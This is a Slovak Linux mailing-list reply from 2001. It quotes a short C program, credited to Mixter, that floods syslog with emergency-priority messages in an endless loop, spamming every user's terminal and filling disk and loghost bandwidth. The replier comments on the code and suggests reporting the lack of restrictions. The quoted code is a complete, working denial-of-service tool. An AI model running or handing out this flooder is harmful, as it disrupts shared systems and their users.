[linux] Re: Syslogd DoS

[Matej Pivoluska]

On Fri, Jul 13, 2001 at 03:41:14PM +0200 carcass wrote:
> ked sme uz pri tom syslogu - skuste si tento "program" :
> 
> 
> /* members.xoom.com/i0wnu - coded by Mixter
>  * This nice little syslog DoS can be used
>  * to mess up EVERYONES terminal, I quote syslog.conf:
>  * # Everybody gets emergency messages, plus log them on another
>  * # machine.
>  * *.emerg                                                 *
>  * :) this eats about 2MB/minute of hd space, and 2MB/minute
>  * of bandwidth if your victim is using a loghost.
>  * Use this only if this is the last way out to get your shell
>  * canceled!:P
>  */
> 
> #include <syslog.h>
> #include <string.h>
> 
> int
> main (int a, char **b)
> {
>   strcpy (b[0], "1z_0wn3d");

/****************** preco sa to "1z" neobjavi aj v logu?*/

>   while (1)
/*no koho by to napadlo, takto {zne,vy}uzit syslog...*/
>     {
>       syslog (0, "|");
>       syslog (0, "/");
>       syslog (0, "-");
>       syslog (0, "\\");
>       syslog (0, "|");
>       syslog (0, "/");
>       syslog (0, "-");
>       syslog (0, "\\");
>     }
>   return 0;
> }
...to tocenie je efektne ;)...
> 
> 
> preco moze *kazdy* zapisovat do syslogu ???

Asy aby mohol kazdy logovat. Nie? 

Ja som v manualy nenasiel ziadne restrikcie ohladom nastaveni kto ako
moze. Je tam len pisane, ako nastavit, aby sa dalo logovat aj zo siete
(defaultne nejde...) (MDK 8.0)

Treba im to reportnut, nech tam porobia restrikcie. 
Ja sa nejdem strapnovat, neviem dobre pisat po anglicky.

mP